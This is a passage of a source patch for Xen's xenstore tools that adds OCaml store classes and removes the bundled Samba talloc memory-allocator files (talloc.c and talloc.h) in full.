| Hack (_, children) -> ( + try List.find (fun child_node -> child_node#path = child_path) children + with Not_found -> raise (Constants.Xs_error (Constants.ENOENT, "Store.node#get_child", child_path)) + ) + | _ -> raise (Constants.Xs_error (Constants.ENOENT, "Store.node#get_child", child_path)) + method remove_child child_path = 
+ match self#contents with + | Children children -> m_contents <- Children (List.filter (fun child_node -> child_node#path <> child_path) children) + | Hack (value, children) -> m_contents <- Hack (value, List.filter (fun child_node -> child_node#path <> child_path) children) + | _ -> raise (Constants.Xs_error (Constants.ENOENT, "Store.node#remove_child", path)) + method set_contents contents = m_contents <- contents +end + +class ['contents] store = +object (self) + val m_root : 'contents node = new node root_path (Children []) + method private construct_node path = + let parent_path = parent_path path in + let parent_node = try self#get_node parent_path with _ -> self#construct_node parent_path + and node = new node path Empty in + if parent_node#add_child node then node else raise (Constants.Xs_error (Constants.ENOENT, "Store.store#construct_node", path)) + method private get_node path = if path = root_path then self#root else (self#get_node (parent_path path))#get_child path + method private root = m_root + method create_node path = ignore (self#construct_node path) + method iter f = iter f self#root + method node_exists path = try ignore (self#get_node path); true with _ -> false + method read_node path = (self#get_node path)#contents + method remove_node path = (self#get_node (parent_path path))#remove_child path + method replace_node (node : 'contents node) = + let node_to_replace = + if node#path = root_path + then self#root + else ( + if self#node_exists node#path then self#remove_node node#path; + self#construct_node node#path + ) in + node_to_replace#set_contents node#contents + method write_node path (contents : 'contents) = + let node = self#get_node path in + match node#contents with + | Empty | Value _ -> node#set_contents (Value contents) + | Children children | Hack (_, children) -> node#set_contents (Hack (contents, children)) +end diff -r 10a8fae412c5 tools/xenstore/talloc.c --- a/tools/xenstore/talloc.c Wed Jan 14 13:43:17 2009 +0000 +++ 
/dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,1311 +0,0 @@ -/* - Samba Unix SMB/CIFS implementation. - - Samba trivial allocation library - new interface - - NOTE: Please read talloc_guide.txt for full documentation - - Copyright (C) Andrew Tridgell 2004 - - ** NOTE! The following LGPL license applies to the talloc - ** library. This does NOT imply that all of Samba is released - ** under the LGPL - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -/* - inspired by http://swapped.cc/halloc/ -*/ - -#ifdef _SAMBA_BUILD_ -#include "includes.h" -#if ((SAMBA_VERSION_MAJOR==3)&&(SAMBA_VERSION_MINOR<9)) -/* This is to circumvent SAMBA3's paranoid malloc checker. Here in this file - * we trust ourselves... 
*/ -#ifdef malloc -#undef malloc -#endif -#ifdef realloc -#undef realloc -#endif -#endif -#else -#include -#include -#include -#include -#include -#include "talloc.h" -/* assume a modern system */ -#define HAVE_VA_COPY -#endif - -/* use this to force every realloc to change the pointer, to stress test - code that might not cope */ -#define ALWAYS_REALLOC 0 - - -#define MAX_TALLOC_SIZE 0x10000000 -#define TALLOC_MAGIC 0xe814ec70 -#define TALLOC_FLAG_FREE 0x01 -#define TALLOC_FLAG_LOOP 0x02 -#define TALLOC_MAGIC_REFERENCE ((const char *)1) - -/* by default we abort when given a bad pointer (such as when talloc_free() is called - on a pointer that came from malloc() */ -#ifndef TALLOC_ABORT -#define TALLOC_ABORT(reason) abort() -#endif - -#ifndef discard_const_p -#if defined(__intptr_t_defined) || defined(HAVE_INTPTR_T) -# define discard_const_p(type, ptr) ((type *)((intptr_t)(ptr))) -#else -# define discard_const_p(type, ptr) ((type *)(ptr)) -#endif -#endif - -/* this null_context is only used if talloc_enable_leak_report() or - talloc_enable_leak_report_full() is called, otherwise it remains - NULL -*/ -static const void *null_context; -static void *cleanup_context; - - -struct talloc_reference_handle { - struct talloc_reference_handle *next, *prev; - void *ptr; -}; - -typedef int (*talloc_destructor_t)(void *); - -struct talloc_chunk { - struct talloc_chunk *next, *prev; - struct talloc_chunk *parent, *child; - struct talloc_reference_handle *refs; - unsigned int null_refs; /* references from null_context */ - talloc_destructor_t destructor; - const char *name; - size_t size; - unsigned flags; -}; - -/* 16 byte alignment seems to keep everyone happy */ -#define TC_HDR_SIZE ((sizeof(struct talloc_chunk)+15)&~15) -#define TC_PTR_FROM_CHUNK(tc) ((void *)(TC_HDR_SIZE + (char*)tc)) - -/* panic if we get a bad magic value */ -static struct talloc_chunk *talloc_chunk_from_ptr(const void *ptr) -{ - const char *pp = ptr; - struct talloc_chunk *tc = discard_const_p(struct 
talloc_chunk, pp - TC_HDR_SIZE); - if ((tc->flags & ~0xF) != TALLOC_MAGIC) { - TALLOC_ABORT("Bad talloc magic value - unknown value"); - } - if (tc->flags & TALLOC_FLAG_FREE) { - TALLOC_ABORT("Bad talloc magic value - double free"); - } - return tc; -} - -/* hook into the front of the list */ -#define _TLIST_ADD(list, p) \ -do { \ - if (!(list)) { \ - (list) = (p); \ - (p)->next = (p)->prev = NULL; \ - } else { \ - (list)->prev = (p); \ - (p)->next = (list); \ - (p)->prev = NULL; \ - (list) = (p); \ - }\ -} while (0) - -/* remove an element from a list - element doesn't have to be in list. */ -#define _TLIST_REMOVE(list, p) \ -do { \ - if ((p) == (list)) { \ - (list) = (p)->next; \ - if (list) (list)->prev = NULL; \ - } else { \ - if ((p)->prev) (p)->prev->next = (p)->next; \ - if ((p)->next) (p)->next->prev = (p)->prev; \ - } \ - if ((p) && ((p) != (list))) (p)->next = (p)->prev = NULL; \ -} while (0) - - -/* - return the parent chunk of a pointer -*/ -static struct talloc_chunk *talloc_parent_chunk(const void *ptr) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - while (tc->prev) tc=tc->prev; - return tc->parent; -} - -void *talloc_parent(const void *ptr) -{ - struct talloc_chunk *tc = talloc_parent_chunk(ptr); - return tc? 
TC_PTR_FROM_CHUNK(tc) : NULL; -} - -/* - Allocate a bit of memory as a child of an existing pointer -*/ -void *_talloc(const void *context, size_t size) -{ - struct talloc_chunk *tc; - - if (context == NULL) { - context = null_context; - } - - if (size >= MAX_TALLOC_SIZE) { - return NULL; - } - - tc = malloc(TC_HDR_SIZE+size); - if (tc == NULL) return NULL; - - tc->size = size; - tc->flags = TALLOC_MAGIC; - tc->destructor = NULL; - tc->child = NULL; - tc->name = NULL; - tc->refs = NULL; - tc->null_refs = 0; - - if (context) { - struct talloc_chunk *parent = talloc_chunk_from_ptr(context); - - tc->parent = parent; - - if (parent->child) { - parent->child->parent = NULL; - } - - _TLIST_ADD(parent->child, tc); - } else { - tc->next = tc->prev = tc->parent = NULL; - } - - return TC_PTR_FROM_CHUNK(tc); -} - - -/* - setup a destructor to be called on free of a pointer - the destructor should return 0 on success, or -1 on failure. - if the destructor fails then the free is failed, and the memory can - be continued to be used -*/ -void talloc_set_destructor(const void *ptr, int (*destructor)(void *)) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - tc->destructor = destructor; -} - -/* - increase the reference count on a piece of memory. -*/ -void talloc_increase_ref_count(const void *ptr) -{ - struct talloc_chunk *tc; - if (ptr == NULL) return; - - tc = talloc_chunk_from_ptr(ptr); - tc->null_refs++; -} - -/* - helper for talloc_reference() -*/ -static int talloc_reference_destructor(void *ptr) -{ - struct talloc_reference_handle *handle = ptr; - struct talloc_chunk *tc1 = talloc_chunk_from_ptr(ptr); - struct talloc_chunk *tc2 = talloc_chunk_from_ptr(handle->ptr); - if (tc1->destructor != (talloc_destructor_t)-1) { - tc1->destructor = NULL; - } - _TLIST_REMOVE(tc2->refs, handle); - talloc_free(handle); - return 0; -} - -/* - make a secondary reference to a pointer, hanging off the given context. 
- the pointer remains valid until both the original caller and this given - context are freed. - - the major use for this is when two different structures need to reference the - same underlying data, and you want to be able to free the two instances separately, - and in either order -*/ -void *talloc_reference(const void *context, const void *ptr) -{ - struct talloc_chunk *tc; - struct talloc_reference_handle *handle; - if (ptr == NULL) return NULL; - - tc = talloc_chunk_from_ptr(ptr); - handle = talloc_named_const(context, sizeof(*handle), TALLOC_MAGIC_REFERENCE); - - if (handle == NULL) return NULL; - - /* note that we hang the destructor off the handle, not the - main context as that allows the caller to still setup their - own destructor on the context if they want to */ - talloc_set_destructor(handle, talloc_reference_destructor); - handle->ptr = discard_const_p(void, ptr); - _TLIST_ADD(tc->refs, handle); - return handle->ptr; -} - -/* - remove a secondary reference to a pointer. This undo's what - talloc_reference() has done. The context and pointer arguments - must match those given to a talloc_reference() -*/ -static int talloc_unreference(const void *context, const void *ptr) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - struct talloc_reference_handle *h; - - if (context == NULL) { - context = null_context; - } - - if ((context == null_context) && tc->null_refs) { - tc->null_refs--; - return 0; - } - - for (h=tc->refs;h;h=h->next) { - struct talloc_chunk *p = talloc_parent_chunk(h); - if (p == NULL) { - if (context == NULL) break; - } else if (TC_PTR_FROM_CHUNK(p) == context) { - break; - } - } - if (h == NULL) { - return -1; - } - - talloc_set_destructor(h, NULL); - _TLIST_REMOVE(tc->refs, h); - talloc_free(h); - return 0; -} - -/* - remove a specific parent context from a pointer. 
This is a more - controlled varient of talloc_free() -*/ -int talloc_unlink(const void *context, void *ptr) -{ - struct talloc_chunk *tc_p, *new_p; - void *new_parent; - - if (ptr == NULL) { - return -1; - } - - if (context == NULL) { - context = null_context; - } - - if (talloc_unreference(context, ptr) == 0) { - return 0; - } - - if (context == NULL) { - if (talloc_parent_chunk(ptr) != NULL) { - return -1; - } - } else { - if (talloc_chunk_from_ptr(context) != talloc_parent_chunk(ptr)) { - return -1; - } - } - - tc_p = talloc_chunk_from_ptr(ptr); - - if (tc_p->refs == NULL) { - return talloc_free(ptr); - } - - new_p = talloc_parent_chunk(tc_p->refs); - if (new_p) { - new_parent = TC_PTR_FROM_CHUNK(new_p); - } else { - new_parent = NULL; - } - - if (talloc_unreference(new_parent, ptr) != 0) { - return -1; - } - - talloc_steal(new_parent, ptr); - - return 0; -} - -/* - add a name to an existing pointer - va_list version -*/ -static void talloc_set_name_v(const void *ptr, const char *fmt, va_list ap) PRINTF_ATTRIBUTE(2,0); - -static void talloc_set_name_v(const void *ptr, const char *fmt, va_list ap) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - tc->name = talloc_vasprintf(ptr, fmt, ap); - if (tc->name) { - talloc_set_name_const(tc->name, ".name"); - } -} - -/* - add a name to an existing pointer -*/ -void talloc_set_name(const void *ptr, const char *fmt, ...) -{ - va_list ap; - va_start(ap, fmt); - talloc_set_name_v(ptr, fmt, ap); - va_end(ap); -} - -/* - more efficient way to add a name to a pointer - the name must point to a - true string constant -*/ -void talloc_set_name_const(const void *ptr, const char *name) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - tc->name = name; -} - -/* - create a named talloc pointer. Any talloc pointer can be named, and - talloc_named() operates just like talloc() except that it allows you - to name the pointer. -*/ -void *talloc_named(const void *context, size_t size, const char *fmt, ...) 
-{ - va_list ap; - void *ptr; - - ptr = _talloc(context, size); - if (ptr == NULL) return NULL; - - va_start(ap, fmt); - talloc_set_name_v(ptr, fmt, ap); - va_end(ap); - - return ptr; -} - -/* - create a named talloc pointer. Any talloc pointer can be named, and - talloc_named() operates just like talloc() except that it allows you - to name the pointer. -*/ -void *talloc_named_const(const void *context, size_t size, const char *name) -{ - void *ptr; - - ptr = _talloc(context, size); - if (ptr == NULL) { - return NULL; - } - - talloc_set_name_const(ptr, name); - - return ptr; -} - -/* - return the name of a talloc ptr, or "UNNAMED" -*/ -const char *talloc_get_name(const void *ptr) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - if (tc->name == TALLOC_MAGIC_REFERENCE) { - return ".reference"; - } - if (tc->name) { - return tc->name; - } - return "UNNAMED"; -} - - -/* - check if a pointer has the given name. If it does, return the pointer, - otherwise return NULL -*/ -void *talloc_check_name(const void *ptr, const char *name) -{ - const char *pname; - if (ptr == NULL) return NULL; - pname = talloc_get_name(ptr); - if (pname == name || strcmp(pname, name) == 0) { - return discard_const_p(void, ptr); - } - return NULL; -} - - -/* - this is for compatibility with older versions of talloc -*/ -void *talloc_init(const char *fmt, ...) -{ - va_list ap; - void *ptr; - - talloc_enable_null_tracking(); - - ptr = _talloc(NULL, 0); - if (ptr == NULL) return NULL; - - va_start(ap, fmt); - talloc_set_name_v(ptr, fmt, ap); - va_end(ap); - - return ptr; -} - -/* - this is a replacement for the Samba3 talloc_destroy_pool functionality. It - should probably not be used in new code. It's in here to keep the talloc - code consistent across Samba 3 and 4. 
-*/ -static void talloc_free_children(void *ptr) -{ - struct talloc_chunk *tc; - - if (ptr == NULL) { - return; - } - - tc = talloc_chunk_from_ptr(ptr); - - while (tc->child) { - /* we need to work out who will own an abandoned child - if it cannot be freed. In priority order, the first - choice is owner of any remaining reference to this - pointer, the second choice is our parent, and the - final choice is the null context. */ - void *child = TC_PTR_FROM_CHUNK(tc->child); - const void *new_parent = null_context; - if (tc->child->refs) { - struct talloc_chunk *p = talloc_parent_chunk(tc->child->refs); - if (p) new_parent = TC_PTR_FROM_CHUNK(p); - } - if (talloc_free(child) == -1) { - if (new_parent == null_context) { - struct talloc_chunk *p = talloc_parent_chunk(ptr); - if (p) new_parent = TC_PTR_FROM_CHUNK(p); - } - talloc_steal(new_parent, child); - } - } -} - -/* - free a talloc pointer. This also frees all child pointers of this - pointer recursively - - return 0 if the memory is actually freed, otherwise -1. 
The memory - will not be freed if the ref_count is > 1 or the destructor (if - any) returns non-zero -*/ -int talloc_free(void *ptr) -{ - struct talloc_chunk *tc; - - if (ptr == NULL) { - return -1; - } - - tc = talloc_chunk_from_ptr(ptr); - - if (tc->null_refs) { - tc->null_refs--; - return -1; - } - - if (tc->refs) { - talloc_reference_destructor(tc->refs); - return -1; - } - - if (tc->flags & TALLOC_FLAG_LOOP) { - /* we have a free loop - stop looping */ - return 0; - } - - if (tc->destructor) { - talloc_destructor_t d = tc->destructor; - if (d == (talloc_destructor_t)-1) { - return -1; - } - tc->destructor = (talloc_destructor_t)-1; - if (d(ptr) == -1) { - tc->destructor = d; - return -1; - } - tc->destructor = NULL; - } - - tc->flags |= TALLOC_FLAG_LOOP; - - talloc_free_children(ptr); - - if (tc->parent) { - _TLIST_REMOVE(tc->parent->child, tc); - if (tc->parent->child) { - tc->parent->child->parent = tc->parent; - } - } else { - if (tc->prev) tc->prev->next = tc->next; - if (tc->next) tc->next->prev = tc->prev; - } - - tc->flags |= TALLOC_FLAG_FREE; - - free(tc); - return 0; -} - - - -/* - A talloc version of realloc. 
The context argument is only used if - ptr is NULL -*/ -void *_talloc_realloc(const void *context, void *ptr, size_t size, const char *name) -{ - struct talloc_chunk *tc; - void *new_ptr; - - /* size zero is equivalent to free() */ - if (size == 0) { - talloc_free(ptr); - return NULL; - } - - if (size >= MAX_TALLOC_SIZE) { - return NULL; - } - - /* realloc(NULL) is equavalent to malloc() */ - if (ptr == NULL) { - return talloc_named_const(context, size, name); - } - - tc = talloc_chunk_from_ptr(ptr); - - /* don't allow realloc on referenced pointers */ - if (tc->refs) { - return NULL; - } - - /* by resetting magic we catch users of the old memory */ - tc->flags |= TALLOC_FLAG_FREE; - -#if ALWAYS_REALLOC - new_ptr = malloc(size + TC_HDR_SIZE); - if (new_ptr) { - memcpy(new_ptr, tc, tc->size + TC_HDR_SIZE); - free(tc); - } -#else - new_ptr = realloc(tc, size + TC_HDR_SIZE); -#endif - if (!new_ptr) { - tc->flags &= ~TALLOC_FLAG_FREE; - return NULL; - } - - tc = new_ptr; - tc->flags &= ~TALLOC_FLAG_FREE; - if (tc->parent) { - tc->parent->child = new_ptr; - } - if (tc->child) { - tc->child->parent = new_ptr; - } - - if (tc->prev) { - tc->prev->next = tc; - } - if (tc->next) { - tc->next->prev = tc; - } - - tc->size = size; - talloc_set_name_const(TC_PTR_FROM_CHUNK(tc), name); - - return TC_PTR_FROM_CHUNK(tc); -} - -/* - move a lump of memory from one talloc context to another return the - ptr on success, or NULL if it could not be transferred. - passing NULL as ptr will always return NULL with no side effects. 
-*/ -void *talloc_steal(const void *new_ctx, const void *ptr) -{ - struct talloc_chunk *tc, *new_tc; - - if (!ptr) { - return NULL; - } - - if (new_ctx == NULL) { - new_ctx = null_context; - } - - tc = talloc_chunk_from_ptr(ptr); - - if (new_ctx == NULL) { - if (tc->parent) { - _TLIST_REMOVE(tc->parent->child, tc); - if (tc->parent->child) { - tc->parent->child->parent = tc->parent; - } - } else { - if (tc->prev) tc->prev->next = tc->next; - if (tc->next) tc->next->prev = tc->prev; - } - - tc->parent = tc->next = tc->prev = NULL; - return discard_const_p(void, ptr); - } - - new_tc = talloc_chunk_from_ptr(new_ctx); - - if (tc == new_tc) { - return discard_const_p(void, ptr); - } - - if (tc->parent) { - _TLIST_REMOVE(tc->parent->child, tc); - if (tc->parent->child) { - tc->parent->child->parent = tc->parent; - } - } else { - if (tc->prev) tc->prev->next = tc->next; - if (tc->next) tc->next->prev = tc->prev; - } - - tc->parent = new_tc; - if (new_tc->child) new_tc->child->parent = NULL; - _TLIST_ADD(new_tc->child, tc); - - return discard_const_p(void, ptr); -} - -/* - return the total size of a talloc pool (subtree) -*/ -off_t talloc_total_size(const void *ptr) -{ - off_t total = 0; - struct talloc_chunk *c, *tc; - - if (ptr == NULL) { - ptr = null_context; - } - if (ptr == NULL) { - return 0; - } - - tc = talloc_chunk_from_ptr(ptr); - - if (tc->flags & TALLOC_FLAG_LOOP) { - return 0; - } - - tc->flags |= TALLOC_FLAG_LOOP; - - total = tc->size; - for (c=tc->child;c;c=c->next) { - total += talloc_total_size(TC_PTR_FROM_CHUNK(c)); - } - - tc->flags &= ~TALLOC_FLAG_LOOP; - - return total; -} - -/* - return the total number of blocks in a talloc pool (subtree) -*/ -off_t talloc_total_blocks(const void *ptr) -{ - off_t total = 0; - struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr); - - if (tc->flags & TALLOC_FLAG_LOOP) { - return 0; - } - - tc->flags |= TALLOC_FLAG_LOOP; - - total++; - for (c=tc->child;c;c=c->next) { - total += 
talloc_total_blocks(TC_PTR_FROM_CHUNK(c)); - } - - tc->flags &= ~TALLOC_FLAG_LOOP; - - return total; -} - -/* - return the number of external references to a pointer -*/ -static int talloc_reference_count(const void *ptr) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - struct talloc_reference_handle *h; - int ret = 0; - - for (h=tc->refs;h;h=h->next) { - ret++; - } - return ret; -} - -/* - report on memory usage by all children of a pointer, giving a full tree view -*/ -void talloc_report_depth(const void *ptr, FILE *f, int depth) -{ - struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr); - - if (tc->flags & TALLOC_FLAG_LOOP) { - return; - } - - tc->flags |= TALLOC_FLAG_LOOP; - - for (c=tc->child;c;c=c->next) { - if (c->name == TALLOC_MAGIC_REFERENCE) { - struct talloc_reference_handle *handle = TC_PTR_FROM_CHUNK(c); - const char *name2 = talloc_get_name(handle->ptr); - fprintf(f, "%*sreference to: %s\n", depth*4, "", name2); - } else { - const char *name = talloc_get_name(TC_PTR_FROM_CHUNK(c)); - fprintf(f, "%*s%-30s contains %6lu bytes in %3lu blocks (ref %d)\n", - depth*4, "", - name, - (unsigned long)talloc_total_size(TC_PTR_FROM_CHUNK(c)), - (unsigned long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c)), - talloc_reference_count(TC_PTR_FROM_CHUNK(c))); - talloc_report_depth(TC_PTR_FROM_CHUNK(c), f, depth+1); - } - } - tc->flags &= ~TALLOC_FLAG_LOOP; -} - -/* - report on memory usage by all children of a pointer, giving a full tree view -*/ -void talloc_report_full(const void *ptr, FILE *f) -{ - if (ptr == NULL) { - ptr = null_context; - } - if (ptr == NULL) return; - - fprintf(f,"full talloc report on '%s' (total %lu bytes in %lu blocks)\n", - talloc_get_name(ptr), - (unsigned long)talloc_total_size(ptr), - (unsigned long)talloc_total_blocks(ptr)); - - talloc_report_depth(ptr, f, 1); - fflush(f); -} - -/* - report on memory usage by all children of a pointer -*/ -void talloc_report(const void *ptr, FILE *f) -{ - struct talloc_chunk *c, *tc; - - if 
(ptr == NULL) { - ptr = null_context; - } - if (ptr == NULL) return; - - fprintf(f,"talloc report on '%s' (total %lu bytes in %lu blocks)\n", - talloc_get_name(ptr), - (unsigned long)talloc_total_size(ptr), - (unsigned long)talloc_total_blocks(ptr)); - - tc = talloc_chunk_from_ptr(ptr); - - for (c=tc->child;c;c=c->next) { - fprintf(f, "\t%-30s contains %6lu bytes in %3lu blocks\n", - talloc_get_name(TC_PTR_FROM_CHUNK(c)), - (unsigned long)talloc_total_size(TC_PTR_FROM_CHUNK(c)), - (unsigned long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c))); - } - fflush(f); -} - -/* - report on any memory hanging off the null context -*/ -static void talloc_report_null(void) -{ - if (talloc_total_size(null_context) != 0) { - talloc_report(null_context, stderr); - } -} - -/* - report on any memory hanging off the null context -*/ -static void talloc_report_null_full(void) -{ - if (talloc_total_size(null_context) != 0) { - talloc_report_full(null_context, stderr); - } -} - -/* - enable tracking of the NULL context -*/ -void talloc_enable_null_tracking(void) -{ - if (null_context == NULL) { - null_context = talloc_named_const(NULL, 0, "null_context"); - } -} - -#ifdef _SAMBA_BUILD_ -/* Ugly calls to Samba-specific sprintf_append... JRA. 
*/ - -/* - report on memory usage by all children of a pointer, giving a full tree view -*/ -static void talloc_report_depth_str(const void *ptr, char **pps, ssize_t *plen, size_t *pbuflen, int depth) -{ - struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr); - - if (tc->flags & TALLOC_FLAG_LOOP) { - return; - } - - tc->flags |= TALLOC_FLAG_LOOP; - - for (c=tc->child;c;c=c->next) { - if (c->name == TALLOC_MAGIC_REFERENCE) { - struct talloc_reference_handle *handle = TC_PTR_FROM_CHUNK(c); - const char *name2 = talloc_get_name(handle->ptr); - - sprintf_append(NULL, pps, plen, pbuflen, - "%*sreference to: %s\n", depth*4, "", name2); - - } else { - const char *name = talloc_get_name(TC_PTR_FROM_CHUNK(c)); - - sprintf_append(NULL, pps, plen, pbuflen, - "%*s%-30s contains %6lu bytes in %3lu blocks (ref %d)\n", - depth*4, "", - name, - (unsigned long)talloc_total_size(TC_PTR_FROM_CHUNK(c)), - (unsigned long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c)), - talloc_reference_count(TC_PTR_FROM_CHUNK(c))); - - talloc_report_depth_str(TC_PTR_FROM_CHUNK(c), pps, plen, pbuflen, depth+1); - } - } - tc->flags &= ~TALLOC_FLAG_LOOP; -} - -/* - report on memory usage by all children of a pointer -*/ -char *talloc_describe_all(void) -{ - ssize_t len = 0; - size_t buflen = 512; - char *s = NULL; - - if (null_context == NULL) { - return NULL; - } - - sprintf_append(NULL, &s, &len, &buflen, - "full talloc report on '%s' (total %lu bytes in %lu blocks)\n", - talloc_get_name(null_context), - (unsigned long)talloc_total_size(null_context), - (unsigned long)talloc_total_blocks(null_context)); - - if (!s) { - return NULL; - } - talloc_report_depth_str(null_context, &s, &len, &buflen, 1); - return s; -} -#endif - -/* - enable leak reporting on exit -*/ -void talloc_enable_leak_report(void) -{ - talloc_enable_null_tracking(); - atexit(talloc_report_null); -} - -/* - enable full leak reporting on exit -*/ -void talloc_enable_leak_report_full(void) -{ - talloc_enable_null_tracking(); - 
atexit(talloc_report_null_full); -} - -/* - talloc and zero memory. -*/ -void *_talloc_zero(const void *ctx, size_t size, const char *name) -{ - void *p = talloc_named_const(ctx, size, name); - - if (p) { - memset(p, '\0', size); - } - - return p; -} - - -/* - memdup with a talloc. -*/ -void *_talloc_memdup(const void *t, const void *p, size_t size, const char *name) -{ - void *newp = talloc_named_const(t, size, name); - - if (newp) { - memcpy(newp, p, size); - } - - return newp; -} - -/* - strdup with a talloc -*/ -char *talloc_strdup(const void *t, const char *p) -{ - char *ret; - if (!p) { - return NULL; - } - ret = talloc_memdup(t, p, strlen(p) + 1); - if (ret) { - talloc_set_name_const(ret, ret); - } - return ret; -} - -/* - append to a talloced string -*/ -char *talloc_append_string(const void *t, char *orig, const char *append) -{ - char *ret; - size_t olen = strlen(orig); - size_t alenz; - - if (!append) - return orig; - - alenz = strlen(append) + 1; - - ret = talloc_realloc(t, orig, char, olen + alenz); - if (!ret) - return NULL; - - /* append the string with the trailing \0 */ - memcpy(&ret[olen], append, alenz); - - return ret; -} - -/* - strndup with a talloc -*/ -char *talloc_strndup(const void *t, const char *p, size_t n) -{ - size_t len; - char *ret; - - for (len=0; lensize - 1; - if ((len = vsnprintf(NULL, 0, fmt, ap2)) <= 0) { - /* Either the vsnprintf failed or the format resulted in - * no characters being formatted. In the former case, we - * ought to return NULL, in the latter we ought to return - * the original string. Most current callers of this - * function expect it to never return NULL. - */ - return s; - } - - s = talloc_realloc(NULL, s, char, s_len + len+1); - if (!s) return NULL; - - VA_COPY(ap2, ap); - - vsnprintf(s+s_len, len+1, fmt, ap2); - talloc_set_name_const(s, s); - - return s; -} - -/* - Realloc @p s to append the formatted result of @p fmt and return @p - s, which may have moved. 
Good for gradually accumulating output - into a string buffer. - */ -char *talloc_asprintf_append(char *s, const char *fmt, ...) -{ - va_list ap; - - va_start(ap, fmt); - s = talloc_vasprintf_append(s, fmt, ap); - va_end(ap); - return s; -} - -/* - alloc an array, checking for integer overflow in the array size -*/ -void *_talloc_array(const void *ctx, size_t el_size, unsigned count, const char *name) -{ - if (count >= MAX_TALLOC_SIZE/el_size) { - return NULL; - } - return talloc_named_const(ctx, el_size * count, name); -} - -/* - alloc an zero array, checking for integer overflow in the array size -*/ -void *_talloc_zero_array(const void *ctx, size_t el_size, unsigned count, const char *name) -{ - if (count >= MAX_TALLOC_SIZE/el_size) { - return NULL; - } - return _talloc_zero(ctx, el_size * count, name); -} - - -/* - realloc an array, checking for integer overflow in the array size -*/ -void *_talloc_realloc_array(const void *ctx, void *ptr, size_t el_size, unsigned count, const char *name) -{ - if (count >= MAX_TALLOC_SIZE/el_size) { - return NULL; - } - return _talloc_realloc(ctx, ptr, el_size * count, name); -} - -/* - a function version of talloc_realloc(), so it can be passed as a function pointer - to libraries that want a realloc function (a realloc function encapsulates - all the basic capabilities of an allocation library, which is why this is useful) -*/ -void *talloc_realloc_fn(const void *context, void *ptr, size_t size) -{ - return _talloc_realloc(context, ptr, size, NULL); -} - - -static void talloc_autofree(void) -{ - talloc_free(cleanup_context); - cleanup_context = NULL; -} - -/* - return a context which will be auto-freed on exit - this is useful for reducing the noise in leak reports -*/ -void *talloc_autofree_context(void) -{ - if (cleanup_context == NULL) { - cleanup_context = talloc_named_const(NULL, 0, "autofree_context"); - atexit(talloc_autofree); - } - return cleanup_context; -} - -size_t talloc_get_size(const void *context) -{ - struct 
talloc_chunk *tc; - - if (context == NULL) - return 0; - - tc = talloc_chunk_from_ptr(context); - - return tc->size; -} - -/* - find a parent of this context that has the given name, if any -*/ -void *talloc_find_parent_byname(const void *context, const char *name) -{ - struct talloc_chunk *tc; - - if (context == NULL) { - return NULL; - } - - tc = talloc_chunk_from_ptr(context); - while (tc) { - if (tc->name && strcmp(tc->name, name) == 0) { - return TC_PTR_FROM_CHUNK(tc); - } - while (tc && tc->prev) tc = tc->prev; - tc = tc->parent; - } - return NULL; -} - -/* - show the parentage of a context -*/ -void talloc_show_parents(const void *context, FILE *file) -{ - struct talloc_chunk *tc; - - if (context == NULL) { - fprintf(file, "talloc no parents for NULL\n"); - return; - } - - tc = talloc_chunk_from_ptr(context); - fprintf(file, "talloc parents of '%s'\n", talloc_get_name(context)); - while (tc) { - fprintf(file, "\t'%s'\n", talloc_get_name(TC_PTR_FROM_CHUNK(tc))); - while (tc && tc->prev) tc = tc->prev; - tc = tc->parent; - } -} diff -r 10a8fae412c5 tools/xenstore/talloc.h --- a/tools/xenstore/talloc.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,144 +0,0 @@ -#ifndef _TALLOC_H_ -#define _TALLOC_H_ -/* - Unix SMB/CIFS implementation. - Samba temporary memory allocation functions - - Copyright (C) Andrew Tridgell 2004-2005 - - ** NOTE! The following LGPL license applies to the talloc - ** library. This does NOT imply that all of Samba is released - ** under the LGPL - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -/* this is only needed for compatibility with the old talloc */ -typedef void TALLOC_CTX; - -/* - this uses a little trick to allow __LINE__ to be stringified -*/ -#define _STRING_LINE_(s) #s -#define _STRING_LINE2_(s) _STRING_LINE_(s) -#define __LINESTR__ _STRING_LINE2_(__LINE__) -#define __location__ __FILE__ ":" __LINESTR__ - -#ifndef TALLOC_DEPRECATED -#define TALLOC_DEPRECATED 0 -#endif - -/* useful macros for creating type checked pointers */ -#define talloc(ctx, type) (type *)talloc_named_const(ctx, sizeof(type), #type) -#define talloc_size(ctx, size) talloc_named_const(ctx, size, __location__) - -#define talloc_new(ctx) talloc_named_const(ctx, 0, "talloc_new: " __location__) - -#define talloc_zero(ctx, type) (type *)_talloc_zero(ctx, sizeof(type), #type) -#define talloc_zero_size(ctx, size) 